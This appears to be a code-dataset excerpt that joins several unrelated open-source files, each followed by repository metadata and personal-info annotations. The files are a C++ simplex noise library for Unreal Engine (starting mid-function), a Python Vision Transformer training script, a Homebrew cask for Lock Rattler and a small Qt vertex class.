	n1 = t1 * t1 * _grad(perm[i1 & 0xff], x1);
	// The maximum value of this noise is 8*(3/4)^4 = 2.53125
	// A factor of 0.395 would scale to fit exactly within [-1,1], but
	// we want to match PRMan's 1D noise, so we scale it down some more.
	return 0.25* (n0 + n1);
}
// Core 2D simplex noise: skews (x,y) onto a triangular grid, finds the
// containing simplex, and sums the falloff-weighted gradient contributions
// of its three corners. Output is scaled to lie in [-1, 1].
double USimplexNoiseBPLibrary::_simplexNoise2D(double x, double y)
{
#define F2 0.366025403784438 // F2 = 0.5*(sqrt(3.0)-1.0)
#define G2 0.211324865405187 // G2 = (3.0-Math.sqrt(3.0))/6.0

	double n0, n1, n2; // Noise contributions from the three corners

	// Skew the input space to determine which simplex cell we're in
	double s = (x + y) * F2; // Hairy factor for 2D
	double xs = x + s;
	double ys = y + s;
	int i = FASTFLOOR(xs);
	int j = FASTFLOOR(ys);

	double t = (double)(i + j) * G2;
	double X0 = i - t; // Unskew the cell origin back to (x,y) space
	double Y0 = j - t;
	double x0 = x - X0; // The x,y distances from the cell origin
	double y0 = y - Y0;

	// For the 2D case, the simplex shape is an equilateral triangle.
	// Determine which simplex we are in.
	int i1, j1; // Offsets for second (middle) corner of simplex in (i,j) coords
	if (x0 > y0) { i1 = 1; j1 = 0; } // lower triangle, XY order: (0,0)->(1,0)->(1,1)
	else { i1 = 0; j1 = 1; } // upper triangle, YX order: (0,0)->(0,1)->(1,1)

	// A step of (1,0) in (i,j) means a step of (1-c,-c) in (x,y), and
	// a step of (0,1) in (i,j) means a step of (-c,1-c) in (x,y), where
	// c = (3-sqrt(3))/6
	double x1 = x0 - i1 + G2; // Offsets for middle corner in (x,y) unskewed coords
	double y1 = y0 - j1 + G2;
	double x2 = x0 - 1.0 + 2.0 * G2; // Offsets for last corner in (x,y) unskewed coords
	double y2 = y0 - 1.0 + 2.0 * G2;

	// Wrap the integer indices at 256, to avoid indexing perm[] out of bounds
	int ii = i & 0xff;
	int jj = j & 0xff;

	// Calculate the contribution from the three corners; corners outside
	// the falloff radius (t < 0) contribute nothing
	double t0 = 0.5 - x0 * x0 - y0 * y0;
	if (t0 < 0.0f) n0 = 0.0f;
	else {
		t0 *= t0;
		n0 = t0 * t0 * _grad(perm[ii + perm[jj]], x0, y0);
	}

	double t1 = 0.5 - x1 * x1 - y1 * y1;
	if (t1 < 0.0) n1 = 0.0;
	else {
		t1 *= t1;
		n1 = t1 * t1 * _grad(perm[ii + i1 + perm[jj + j1]], x1, y1);
	}

	double t2 = 0.5 - x2 * x2 - y2 * y2;
	if (t2 < 0.0) n2 = 0.0;
	else {
		t2 *= t2;
		n2 = t2 * t2 * _grad(perm[ii + 1 + perm[jj + 1]], x2, y2);
	}

	// Add contributions from each corner to get the final noise value.
	// The result is scaled to return values in the interval [-1,1]
	return 40.0 / 0.884343445 * (n0 + n1 + n2); //accurate to e-9 so that values scale to [-1, 1], same acc as F2 G2.
}
// Core 3D simplex noise: skews (x,y,z) onto a tetrahedral grid, determines
// the containing simplex by ranking the fractional coordinates, and sums
// the falloff-weighted gradient contributions of its four corners.
double USimplexNoiseBPLibrary::_simplexNoise3D(double x, double y, double z)
{
	// Simple skewing factors for the 3D case
#define F3 0.3333333333333333333
#define G3 0.1666666666666666667

	double n0, n1, n2, n3; // Noise contributions from the four corners

	// Skew the input space to determine which simplex cell we're in
	double s = (x + y + z) * F3; // Very nice and simple skew factor for 3D
	double xs = x + s;
	double ys = y + s;
	double zs = z + s;
	int i = FASTFLOOR(xs);
	int j = FASTFLOOR(ys);
	int k = FASTFLOOR(zs);

	double t = (double)(i + j + k) * G3;
	double X0 = i - t; // Unskew the cell origin back to (x,y,z) space
	double Y0 = j - t;
	double Z0 = k - t;
	double x0 = x - X0; // The x,y,z distances from the cell origin
	double y0 = y - Y0;
	double z0 = z - Z0;

	// For the 3D case, the simplex shape is a slightly irregular tetrahedron.
	// Determine which simplex we are in.
	int i1, j1, k1; // Offsets for second corner of simplex in (i,j,k) coords
	int i2, j2, k2; // Offsets for third corner of simplex in (i,j,k) coords

	/* This code would benefit from a backport from the GLSL version! */
	if (x0 >= y0) {
		if (y0 >= z0)
		{
			i1 = 1; j1 = 0; k1 = 0; i2 = 1; j2 = 1; k2 = 0;
		} // X Y Z order
		else if (x0 >= z0) { i1 = 1; j1 = 0; k1 = 0; i2 = 1; j2 = 0; k2 = 1; } // X Z Y order
		else { i1 = 0; j1 = 0; k1 = 1; i2 = 1; j2 = 0; k2 = 1; } // Z X Y order
	}
	else { // x0<y0
		if (y0 < z0) { i1 = 0; j1 = 0; k1 = 1; i2 = 0; j2 = 1; k2 = 1; } // Z Y X order
		else if (x0 < z0) { i1 = 0; j1 = 1; k1 = 0; i2 = 0; j2 = 1; k2 = 1; } // Y Z X order
		else { i1 = 0; j1 = 1; k1 = 0; i2 = 1; j2 = 1; k2 = 0; } // Y X Z order
	}

	// A step of (1,0,0) in (i,j,k) means a step of (1-c,-c,-c) in (x,y,z),
	// a step of (0,1,0) in (i,j,k) means a step of (-c,1-c,-c) in (x,y,z), and
	// a step of (0,0,1) in (i,j,k) means a step of (-c,-c,1-c) in (x,y,z), where
	// c = 1/6.
	double x1 = x0 - i1 + G3; // Offsets for second corner in (x,y,z) coords
	double y1 = y0 - j1 + G3;
	double z1 = z0 - k1 + G3;
	double x2 = x0 - i2 + 2.0 * G3; // Offsets for third corner in (x,y,z) coords
	double y2 = y0 - j2 + 2.0 * G3;
	double z2 = z0 - k2 + 2.0 * G3;
	double x3 = x0 - 1.0 + 3.0 * G3; // Offsets for last corner in (x,y,z) coords
	double y3 = y0 - 1.0 + 3.0 * G3;
	double z3 = z0 - 1.0 + 3.0 * G3;

	// Wrap the integer indices at 256, to avoid indexing perm[] out of bounds
	int ii = i & 0xff;
	int jj = j & 0xff;
	int kk = k & 0xff;

	// Calculate the contribution from the four corners; corners outside
	// the falloff radius (t < 0) contribute nothing
	double t0 = 0.6 - x0 * x0 - y0 * y0 - z0 * z0;
	if (t0 < 0.0) n0 = 0.0;
	else {
		t0 *= t0;
		n0 = t0 * t0 * _grad(perm[ii + perm[jj + perm[kk]]], x0, y0, z0);
	}

	double t1 = 0.6 - x1 * x1 - y1 * y1 - z1 * z1;
	if (t1 < 0.0) n1 = 0.0;
	else {
		t1 *= t1;
		n1 = t1 * t1 * _grad(perm[ii + i1 + perm[jj + j1 + perm[kk + k1]]], x1, y1, z1);
	}

	double t2 = 0.6 - x2 * x2 - y2 * y2 - z2 * z2;
	if (t2 < 0.0) n2 = 0.0;
	else {
		t2 *= t2;
		n2 = t2 * t2 * _grad(perm[ii + i2 + perm[jj + j2 + perm[kk + k2]]], x2, y2, z2);
	}

	double t3 = 0.6 - x3 * x3 - y3 * y3 - z3 * z3;
	if (t3 < 0.0) n3 = 0.0;
	else {
		t3 *= t3;
		n3 = t3 * t3 * _grad(perm[ii + 1 + perm[jj + 1 + perm[kk + 1]]], x3, y3, z3);
	}

	// Add contributions from each corner to get the final noise value.
	// The result is scaled to stay just inside [-1,1]
	return 32.0 * (n0 + n1 + n2 + n3); // TODO: The scale factor is preliminary!
}
// Core 4D simplex noise: skews (x,y,z,w) onto a 4D simplex grid, picks the
// corner traversal order from the static simplex[] table, and sums the
// falloff-weighted gradient contributions of the five corners.
double USimplexNoiseBPLibrary::_simplexNoise4D(double x, double y, double z, double w)
{
#define F4 0.3090169943749474 // F4 = (Math.sqrt(5.0)-1.0)/4.0
#define G4 0.1381966011250105 // G4 = (5.0-Math.sqrt(5.0))/20.0

	double n0, n1, n2, n3, n4; // Noise contributions from the five corners

	// Skew the (x,y,z,w) space to determine which cell of 24 simplices we're in
	double s = (x + y + z + w) * F4; // Factor for 4D skewing
	double xs = x + s;
	double ys = y + s;
	double zs = z + s;
	double ws = w + s;
	int i = FASTFLOOR(xs);
	int j = FASTFLOOR(ys);
	int k = FASTFLOOR(zs);
	int l = FASTFLOOR(ws);

	double t = (i + j + k + l) * G4; // Factor for 4D unskewing
	double X0 = i - t; // Unskew the cell origin back to (x,y,z,w) space
	double Y0 = j - t;
	double Z0 = k - t;
	double W0 = l - t;
	double x0 = x - X0; // The x,y,z,w distances from the cell origin
	double y0 = y - Y0;
	double z0 = z - Z0;
	double w0 = w - W0;

	// For the 4D case, the simplex is a 4D shape I won't even try to describe.
	// To find out which of the 24 possible simplices we're in, we need to
	// determine the magnitude ordering of x0, y0, z0 and w0.
	// The method below is a good way of finding the ordering of x,y,z,w and
	// then find the correct traversal order for the simplex were in.
	// First, six pair-wise comparisons are performed between each possible pair
	// of the four coordinates, and the results are used to add up binary bits
	// for an integer index.
	int c1 = (x0 > y0) ? 32 : 0;
	int c2 = (x0 > z0) ? 16 : 0;
	int c3 = (y0 > z0) ? 8 : 0;
	int c4 = (x0 > w0) ? 4 : 0;
	int c5 = (y0 > w0) ? 2 : 0;
	int c6 = (z0 > w0) ? 1 : 0;
	int c = c1 + c2 + c3 + c4 + c5 + c6;

	int i1, j1, k1, l1; // The integer offsets for the second simplex corner
	int i2, j2, k2, l2; // The integer offsets for the third simplex corner
	int i3, j3, k3, l3; // The integer offsets for the fourth simplex corner

	// simplex[c] is a 4-vector with the numbers 0, 1, 2 and 3 in some order.
	// Many values of c will never occur, since e.g. x>y>z>w makes x<z, y<w and x<w
	// impossible. Only the 24 indices which have non-zero entries make any sense.
	// We use a thresholding to set the coordinates in turn from the largest magnitude.
	// The number 3 in the "simplex" array is at the position of the largest coordinate.
	i1 = simplex[c][0] >= 3 ? 1 : 0;
	j1 = simplex[c][1] >= 3 ? 1 : 0;
	k1 = simplex[c][2] >= 3 ? 1 : 0;
	l1 = simplex[c][3] >= 3 ? 1 : 0;
	// The number 2 in the "simplex" array is at the second largest coordinate.
	i2 = simplex[c][0] >= 2 ? 1 : 0;
	j2 = simplex[c][1] >= 2 ? 1 : 0;
	k2 = simplex[c][2] >= 2 ? 1 : 0;
	l2 = simplex[c][3] >= 2 ? 1 : 0;
	// The number 1 in the "simplex" array is at the second smallest coordinate.
	i3 = simplex[c][0] >= 1 ? 1 : 0;
	j3 = simplex[c][1] >= 1 ? 1 : 0;
	k3 = simplex[c][2] >= 1 ? 1 : 0;
	l3 = simplex[c][3] >= 1 ? 1 : 0;
	// The fifth corner has all coordinate offsets = 1, so no need to look that up.

	double x1 = x0 - i1 + G4; // Offsets for second corner in (x,y,z,w) coords
	double y1 = y0 - j1 + G4;
	double z1 = z0 - k1 + G4;
	double w1 = w0 - l1 + G4;
	double x2 = x0 - i2 + 2.0 * G4; // Offsets for third corner in (x,y,z,w) coords
	double y2 = y0 - j2 + 2.0 * G4;
	double z2 = z0 - k2 + 2.0 * G4;
	double w2 = w0 - l2 + 2.0 * G4;
	double x3 = x0 - i3 + 3.0 * G4; // Offsets for fourth corner in (x,y,z,w) coords
	double y3 = y0 - j3 + 3.0 * G4;
	double z3 = z0 - k3 + 3.0 * G4;
	double w3 = w0 - l3 + 3.0 * G4;
	double x4 = x0 - 1.0 + 4.0 * G4; // Offsets for last corner in (x,y,z,w) coords
	double y4 = y0 - 1.0 + 4.0 * G4;
	double z4 = z0 - 1.0 + 4.0 * G4;
	double w4 = w0 - 1.0 + 4.0 * G4;

	// Wrap the integer indices at 256, to avoid indexing perm[] out of bounds
	int ii = i & 0xff;
	int jj = j & 0xff;
	int kk = k & 0xff;
	int ll = l & 0xff;

	// Calculate the contribution from the five corners; corners outside
	// the falloff radius (t < 0) contribute nothing
	double t0 = 0.6 - x0 * x0 - y0 * y0 - z0 * z0 - w0 * w0;
	if (t0 < 0.0) n0 = 0.0;
	else {
		t0 *= t0;
		n0 = t0 * t0 * _grad(perm[ii + perm[jj + perm[kk + perm[ll]]]], x0, y0, z0, w0);
	}

	double t1 = 0.6 - x1 * x1 - y1 * y1 - z1 * z1 - w1 * w1;
	if (t1 < 0.0) n1 = 0.0;
	else {
		t1 *= t1;
		n1 = t1 * t1 * _grad(perm[ii + i1 + perm[jj + j1 + perm[kk + k1 + perm[ll + l1]]]], x1, y1, z1, w1);
	}

	double t2 = 0.6 - x2 * x2 - y2 * y2 - z2 * z2 - w2 * w2;
	if (t2 < 0.0) n2 = 0.0;
	else {
		t2 *= t2;
		n2 = t2 * t2 * _grad(perm[ii + i2 + perm[jj + j2 + perm[kk + k2 + perm[ll + l2]]]], x2, y2, z2, w2);
	}

	double t3 = 0.6 - x3 * x3 - y3 * y3 - z3 * z3 - w3 * w3;
	if (t3 < 0.0) n3 = 0.0;
	else {
		t3 *= t3;
		n3 = t3 * t3 * _grad(perm[ii + i3 + perm[jj + j3 + perm[kk + k3 + perm[ll + l3]]]], x3, y3, z3, w3);
	}

	double t4 = 0.6 - x4 * x4 - y4 * y4 - z4 * z4 - w4 * w4;
	if (t4 < 0.0) n4 = 0.0;
	else {
		t4 *= t4;
		n4 = t4 * t4 * _grad(perm[ii + 1 + perm[jj + 1 + perm[kk + 1 + perm[ll + 1]]]], x4, y4, z4, w4);
	}

	// Sum up and scale the result to cover the range [-1,1]
	return 27.0 * (n0 + n1 + n2 + n3 + n4);
}
// 1D Simplex Noise
// Blueprint-facing wrapper: applies the frequency factor before sampling
// and narrows the double-precision result to float.
float USimplexNoiseBPLibrary::SimplexNoise1D(float x, float inFactor)
{
	const double sample = _simplexNoise1D(x * inFactor);
	return static_cast<float>(sample);
}
// 2D Simplex Noise
// Blueprint-facing wrapper: applies the frequency factor before sampling
// and narrows the double-precision result to float.
float USimplexNoiseBPLibrary::SimplexNoise2D(float x, float y, float inFactor)
{
	const double sample = _simplexNoise2D(x * inFactor, y * inFactor);
	return static_cast<float>(sample);
}
// 3D Simplex Noise
// Blueprint-facing wrapper: applies the frequency factor before sampling
// and narrows the double-precision result to float.
float USimplexNoiseBPLibrary::SimplexNoise3D(float x, float y, float z, float inFactor)
{
	const double sample = _simplexNoise3D(x * inFactor, y * inFactor, z * inFactor);
	return static_cast<float>(sample);
}
// 4D Simplex Noise
// Blueprint-facing wrapper: applies the frequency factor before sampling
// and narrows the double-precision result to float.
float USimplexNoiseBPLibrary::SimplexNoise4D(float x, float y, float z, float w, float inFactor)
{
	const double sample = _simplexNoise4D(x * inFactor, y * inFactor, z * inFactor, w * inFactor);
	return static_cast<float>(sample);
}
// Scaled by float value
// Returns 1D noise multiplied by scaleOut, i.e. roughly [-scaleOut, scaleOut].
float USimplexNoiseBPLibrary::SimplexNoiseScaled1D(float x, float scaleOut, float inFactor)
{
	return _simplexNoise1D(x * inFactor) * scaleOut;
}
// Same as SimplexNoise2D, but the output is multiplied by scaleOut.
float USimplexNoiseBPLibrary::SimplexNoiseScaled2D(float x, float y, float scaleOut, float inFactor)
{
	const auto sample = _simplexNoise2D(x * inFactor, y * inFactor);
	return sample * scaleOut;
}
// Same as SimplexNoise3D, but the output is multiplied by scaleOut.
float USimplexNoiseBPLibrary::SimplexNoiseScaled3D(float x, float y, float z, float scaleOut, float inFactor)
{
	// Bug fix: the original returned the raw noise and silently ignored
	// scaleOut, unlike the 1D/2D variants (this also broke
	// SimplexNoiseInRange3D, which relies on the scaling).
	return _simplexNoise3D(x * inFactor, y * inFactor, z * inFactor) * scaleOut;
}
// Same as SimplexNoise4D, but the output is multiplied by scaleOut.
float USimplexNoiseBPLibrary::SimplexNoiseScaled4D(float x, float y, float z, float w, float scaleOut, float inFactor)
{
	// Bug fix: the original returned the raw noise and silently ignored
	// scaleOut, unlike the 1D/2D variants (this also broke
	// SimplexNoiseInRange4D). Stray trailing semicolon removed as well.
	return _simplexNoise4D(x * inFactor, y * inFactor, z * inFactor, w * inFactor) * scaleOut;
}
// Return value in Range between two float numbers.
// Return Value is scaled by difference between rangeMin & rangeMax value.
float USimplexNoiseBPLibrary::SimplexNoiseInRange1D(float x, float rangeMin, float rangeMax, float inFactor)
{
	// Guard against an inverted range; fall back to [rangeMin, rangeMin + 1].
	if (rangeMax < rangeMin)
	{
		rangeMax = rangeMin + 1.0f;
	}
	const float span = rangeMax - rangeMin;
	return SimplexNoiseScaled1D(x, span, inFactor) + rangeMin;
}
// 2D noise remapped into [rangeMin, rangeMax] (see SimplexNoiseInRange1D).
float USimplexNoiseBPLibrary::SimplexNoiseInRange2D(float x, float y, float rangeMin, float rangeMax, float inFactor)
{
	// Guard against an inverted range; fall back to [rangeMin, rangeMin + 1].
	if (rangeMax < rangeMin)
	{
		rangeMax = rangeMin + 1.0f;
	}
	const float span = rangeMax - rangeMin;
	return SimplexNoiseScaled2D(x, y, span, inFactor) + rangeMin;
}
// 3D noise remapped into [rangeMin, rangeMax] (see SimplexNoiseInRange1D).
float USimplexNoiseBPLibrary::SimplexNoiseInRange3D(float x, float y, float z, float rangeMin, float rangeMax, float inFactor)
{
	// Guard against an inverted range; fall back to [rangeMin, rangeMin + 1].
	if (rangeMax < rangeMin)
	{
		rangeMax = rangeMin + 1.0f;
	}
	const float span = rangeMax - rangeMin;
	return SimplexNoiseScaled3D(x, y, z, span, inFactor) + rangeMin;
}
// 4D noise remapped into [rangeMin, rangeMax] (see SimplexNoiseInRange1D).
float USimplexNoiseBPLibrary::SimplexNoiseInRange4D(float x, float y, float z, float w, float rangeMin, float rangeMax, float inFactor)
{
	// Guard against an inverted range; fall back to [rangeMin, rangeMin + 1].
	if (rangeMax < rangeMin)
	{
		rangeMax = rangeMin + 1.0f;
	}
	const float span = rangeMax - rangeMin;
	return SimplexNoiseScaled4D(x, y, z, w, span, inFactor) + rangeMin;
}
|
C++
|
MIT
|
gaborpapp/UE4SimplexNoise/Source/SimplexNoise/Private/SimplexNoiseBPLibrary.cpp
|
19c6bbfe-3072-47c4-9159-d34554ce7819
|
[{"tag": "NAME", "value": "Stefan Gustavson", "start": 219, "end": 235, "context": "d and extended from the implementation written by Stefan Gustavson (stegu@itn.liu.se)\nand modified to fit to Unreal "}, {"tag": "NAME", "value": "Afan Olovcic", "start": 38, "end": 50, "context": "\ufeff/*\nSimplexNoise 1.0.0\n-----\nDevDad - Afan Olovcic @ www.art-and-code.com - 08/12/2015\n\nThis algorit"}, {"tag": "NAME", "value": "Ken Perlin", "start": 130, "end": 140, "context": "2/2015\n\nThis algorithm was originally designed by Ken Perlin, but my code has been\nadapted and extended from t"}, {"tag": "EMAIL", "value": "stegu@itn.liu.se", "start": 237, "end": 253, "context": "m the implementation written by Stefan Gustavson (stegu@itn.liu.se)\nand modified to fit to Unreal Engine 4\n\n\n* This "}]
|
[{"tag": "NAME", "value": "Stefan Gustavson", "start": 219, "end": 235, "context": "d and extended from the implementation written by Stefan Gustavson (stegu@itn.liu.se)\nand modified to fit to Unreal "}, {"tag": "NAME", "value": "Afan Olovcic", "start": 38, "end": 50, "context": "\ufeff/*\nSimplexNoise 1.0.0\n-----\nDevDad - Afan Olovcic @ www.art-and-code.com - 08/12/2015\n\nThis algorit"}, {"tag": "NAME", "value": "Ken Perlin", "start": 130, "end": 140, "context": "2/2015\n\nThis algorithm was originally designed by Ken Perlin, but my code has been\nadapted and extended from t"}, {"tag": "EMAIL", "value": "stegu@itn.liu.se", "start": 237, "end": 253, "context": "m the implementation written by Stefan Gustavson (stegu@itn.liu.se)\nand modified to fit to Unreal Engine 4\n\n\n* This "}]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: Irving He
# email: 1910646@tongji.edu.cn
import logging
import argparse
import os
import random
import numpy as np
from tqdm import tqdm
import datetime
from datetime import timedelta
import torch
import torch.distributed as dist
from Data_utils import get_loader
from Data_utils import CONFIGS
from Model import VITransModel
from Utils import WarmupCosineSchedule,WarmupLinearSchedule
from Utils import set_seed, AverageMeter, simple_accuracy, model_save
from tensorboardX import SummaryWriter
def count_parameters(model):
    """Return the number of trainable parameters of ``model``, in millions."""
    trainable = (p.numel() for p in model.parameters() if p.requires_grad)
    return sum(trainable) / 1000000
"""Config"""
class VITConfig:
log_dir = "./TB_log/"
dataset = "cifar10" # "cifar100"
model_type = "ViT-B_16"
pretrained_dir = "./Pretrained/imagenet21k_ViT-B_16.npz" # 预训练模型存放位置
save_dir = "./Model/"
record_algo = "Pretrained_VIT_Cifar10_ViTB16_"
test_cycles = datetime.datetime.now().strftime('%Y%m%d_%H%M')
decay_type = "cosine" # "cosine", "linear" 决定了学习率Scheduler类型
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
TB_log = True
img_size = 224
train_batch_size = 64 #512
eval_batch_size = 32 #64
eval_every = 100 # Run prediction on validation set every so many steps.
learning_rate = 3e-2 # SGD起始学习率
weight_decay = 0 #
num_steps = 10000 # Total number of training epochs to perform.
warmup_steps = 500 # 开始的Warmup Step数
max_grad_norm = 1.0
local_rank = -1 # local_rank for distributed training on gpus
seed = 42
gradient_accumulation_steps = 1 # Number of updates steps to accumulate before performing a backward/update pass.
"""Model Valid Process"""
def valid(args,model,writer,test_loader,global_step):
"""
:param args: 参数Config
:param model: 需验证模型
:param writer: TB写入
:param test_loader: 测试数据集
:param global_step: 全局step
:return:
"""
# Validation
eval_losses = AverageMeter()
model.eval()
all_preds, all_label = [],[]
epoch_iterator = tqdm(test_loader,
desc="Validating... (loss=X.X)",
bar_format="{l_bar}{r_bar}",
dynamic_ncols=True)
loss_fct = torch.nn.CrossEntropyLoss()
global_eval_step = 0
for step, batch in enumerate(epoch_iterator):
global_eval_step += 1
batch = tuple(t.to(args.device) for t in batch)
x,y = batch
with torch.no_grad():
logits = model(x)[0]
eval_loss = loss_fct(logits,y)
eval_losses.update(eval_loss.item()) #滑动平均
preds = torch.argmax(logits,dim=-1)
if len(all_preds) == 0:
all_preds.append(preds.detach().cpu().numpy())
all_label.append(y.detach().cpu().numpy())
else:
# append在后面
all_preds[0] = np.append(all_preds[0], preds.detach().cpu().numpy(), axis=0)
all_label[0] = np.append(all_label[0], y.detach().cpu().numpy(), axis=0)
epoch_iterator.set_description("Validating... (loss=%2.5f)" % eval_losses.val)
writer.add_scalar("Train/loss", scalar_value=eval_losses.val, global_step=global_eval_step)
all_preds, all_label = all_preds[0], all_label[0]
# all_preds: numpy.array; all_label: numpy.array;
accuracy = simple_accuracy(all_preds,all_label)
writer.add_scalar("test/accuracy",scalar_value=accuracy,global_step=global_step)
return accuracy
"""Model Training Process"""
def train(args=VITConfig()):
"""
:param args:
- log_dir
"""
# 模型准备
pretrained_model_config = CONFIGS[args.model_type]
num_classes = 10 if args.dataset == "cifar10" else 100
model = VITransModel(pretrained_model_config, args.img_size, zero_head=True, num_classes=num_classes)
model.load_from(np.load(args.pretrained_dir))
model.to(device=args.device)
num_params = count_parameters(model)
if args.TB_log:
os.makedirs(args.log_dir, exist_ok=True)
writer = SummaryWriter(logdir=args.log_dir + args.record_algo + args.test_cycles)
args.train_batch_size = args.train_batch_size // args.gradient_accumulation_steps
# 1. DATA准备
train_loader, test_loader = get_loader(args)
# 2. 准备优化器以及Scheduler
optimizer = torch.optim.SGD(model.parameters(),
lr = args.learning_rate, # init lr
momentum=0.9,
weight_decay=args.weight_decay)
t_total = args.num_steps # Total time steps
if args.decay_type == "cosine":
scheduler = WarmupCosineSchedule(optimizer, warmup_steps=args.warmup_steps, t_total=t_total)
else:
scheduler = WarmupLinearSchedule(optimizer, warmup_steps=args.warmup_steps, t_total=t_total)
# 3. Training
model.zero_grad()
set_seed(args.seed)
losses = AverageMeter()
global_step = 0
best_acc = 0
while True:
model.train()
# 一个数据迭代器
epoch_iterator = tqdm(train_loader,
desc="Training (X / X Steps) (loss=X.X)",
bar_format="{l_bar}{r_bar}",
dynamic_ncols=True)
for step, batch in enumerate(epoch_iterator):
batch = tuple(t.to(args.device) for t in batch)
x,y = batch # XData, YLabel
loss = model.forward(x,y)
loss.backward()
if (step+1)%args.gradient_accumulation_steps == 0:
losses.update(loss.item()*args.gradient_accumulation_steps)
torch.nn.utils.clip_grad_norm(model.parameters(),1.0)
scheduler.step()
optimizer.step()
optimizer.zero_grad()
global_step += 1
# Print Training Info
epoch_iterator.set_description(
"Training (%d / %d Steps) (loss=%2.5f)" % (global_step, t_total, losses.val)
)
writer.add_scalar("Train/loss",scalar_value=losses.val, global_step=global_step)
writer.add_scalar("Train/lr", scalar_value=scheduler.get_lr()[0], global_step=global_step)
# Valid ...
if global_step % args.eval_every == 0:
accuracy = valid(args, model, writer, test_loader, global_step)
if best_acc < accuracy:
best_acc = accuracy
model_save(args.record_algo+args.test_cycles,model)
model.train()
if global_step % t_total == 0:
break
losses.reset()
if global_step % t_total == 0:
break
writer.close()
print("==="*30)
print("Best Accuracy: \t%f" % best_acc)
print("End Training!")
print("==="*30)
if __name__ == "__main__":
train()
# all_preds = []
# all_labels = []
#
# all_pred = torch.tensor([1,0,1,1,0,1])
# all_label = torch.tensor([1,1,1,1,1,1])
#
# all_preds.append(all_pred)
# all_labels.append(all_label)
# print(all_preds)
# all_preds[0] = np.append(all_preds[0],all_label,axis=0)
# all_labels[0] = np.append(all_labels[0],all_pred,axis=0)
# print(type(all_preds[0]))
# print(type(all_labels[0]))
# acc = simple_accuracy(all_preds[0],all_labels[0])
# print(acc)
|
Python
|
MIT
|
HzcIrving/DLRL-PlayGround/VIT/Train.py
|
e5d12dd2-a9b4-472b-9317-c64d69ce7d31
|
[{"tag": "EMAIL", "value": "1910646@tongji.edu.cn", "start": 77, "end": 98, "context": "- coding: utf-8 -*-\n# author: Irving He \n# email: 1910646@tongji.edu.cn\n\nimport logging\nimport argparse\nimport os\nimport "}, {"tag": "NAME", "value": "Irving He", "start": 57, "end": 66, "context": "/bin/enc python\n# -*- coding: utf-8 -*-\n# author: Irving He \n# email: 1910646@tongji.edu.cn\n\nimport logging\ni"}]
|
[{"tag": "EMAIL", "value": "1910646@tongji.edu.cn", "start": 77, "end": 98, "context": "- coding: utf-8 -*-\n# author: Irving He \n# email: 1910646@tongji.edu.cn\n\nimport logging\nimport argparse\nimport os\nimport "}, {"tag": "NAME", "value": "Irving He", "start": 57, "end": 66, "context": "/bin/enc python\n# -*- coding: utf-8 -*-\n# author: Irving He \n# email: 1910646@tongji.edu.cn\n\nimport logging\ni"}]
|
# Homebrew Cask for Lock Rattler, a macOS security-settings checker.
cask 'lockrattler' do
# version is "app_version,year.month"; the parts are split below to build the URL.
version '4.15,2018.11'
sha256 '6622386f8d83dc9efefb8c03a4dbfc18e7928d89ffc2ec3e2feb9473e8f410c9'
# eclecticlightdotcom.files.wordpress.com was verified as official when first introduced to the cask
# after_comma ("2018.11") becomes the "2018/11" path; before_comma ("4.15")
# yields the "lockrattler415" archive/folder name.
url "https://eclecticlightdotcom.files.wordpress.com/#{version.after_comma.dots_to_slashes}/lockrattler#{version.before_comma.major}#{version.before_comma.minor}.zip"
name 'Lock Rattler'
homepage 'https://eclecticlight.co/'
depends_on macos: '>= :el_capitan'
app "lockrattler#{version.before_comma.major}#{version.before_comma.minor}/LockRattler.app"
end
|
Ruby
|
BSD-2-Clause
|
JamesChevalier/homebrew-cask/Casks/lockrattler.rb
|
32d727fd-5122-424c-b28f-f4c701d16411
|
[{"tag": "SSH_KEY", "value": "6622386f8d83dc9efefb8c03a4dbfc18e7928d89ffc2ec3e2feb9473e8f410c9", "start": 57, "end": 121, "context": "ockrattler' do\n version '4.15,2018.11'\n sha256 '6622386f8d83dc9efefb8c03a4dbfc18e7928d89ffc2ec3e2feb9473e8f410c9'\n\n # eclecticlightdotcom.files.wordpress.com was"}]
|
[{"tag": "KEY", "value": "6622386f8d83dc9efefb8c03a4dbfc18e7928d89ffc2ec3e2feb9473e8f410c9", "start": 57, "end": 121, "context": "ockrattler' do\n version '4.15,2018.11'\n sha256 '6622386f8d83dc9efefb8c03a4dbfc18e7928d89ffc2ec3e2feb9473e8f410c9'\n\n # eclecticlightdotcom.files.wordpress.com was"}]
|
/*
* Copyright (c) 2018 Gustavo Valiente gustavo.valiente@protonmail.com
*
* This software is provided 'as-is', without any express or implied
* warranty. In no event will the authors be held liable for any damages
* arising from the use of this software.
*
* Permission is granted to anyone to use this software for any purpose,
* including commercial applications, and to alter it and redistribute it
* freely, subject to the following restrictions:
*
* 1. The origin of this software must not be misrepresented; you must not
* claim that you wrote the original software. If you use this software
* in a product, an acknowledgment in the product documentation would be
* appreciated but is not required.
* 2. Altered source versions must be plainly marked as such, and must not be
* misrepresented as being the original software.
* 3. This notice may not be removed or altered from any source distribution.
*/
#include "q3dvertex.h"
#include <QColor>
// Constructs a vertex from its 3D position and color; both are copied
// into the members via the initializer list.
Q3DVertex::Q3DVertex(const QVector3D& position, const Q3DColor& color) noexcept :
_position(position),
_color(color)
{
}
// Returns a read-only reference to the stored position.
const QVector3D& Q3DVertex::position() const noexcept
{
return _position;
}
// Replaces the stored position with a copy of the argument.
void Q3DVertex::setPosition(const QVector3D& position) noexcept
{
_position = position;
}
// Returns a read-only reference to the stored color.
const Q3DColor& Q3DVertex::color() const noexcept
{
return _color;
}
// Replaces the stored color with a copy of the argument.
void Q3DVertex::setColor(const Q3DColor& color) noexcept
{
_color = color;
}
|
C++
|
MIT
|
GValiente/pcps/3rd_party/q3dobserver/lib/src/q3dvertex.cpp
|
8d9a3de4-33a7-44da-97c7-3a9659623ac6
|
[{"tag": "EMAIL", "value": "gustavo.valiente@protonmail.com", "start": 42, "end": 73, "context": "/*\n * Copyright (c) 2018 Gustavo Valiente gustavo.valiente@protonmail.com\n *\n * This software is provided 'as-is', without "}, {"tag": "NAME", "value": "Gustavo Valiente", "start": 25, "end": 41, "context": "/*\n * Copyright (c) 2018 Gustavo Valiente gustavo.valiente@protonmail.com\n *\n * This softwa"}]
|
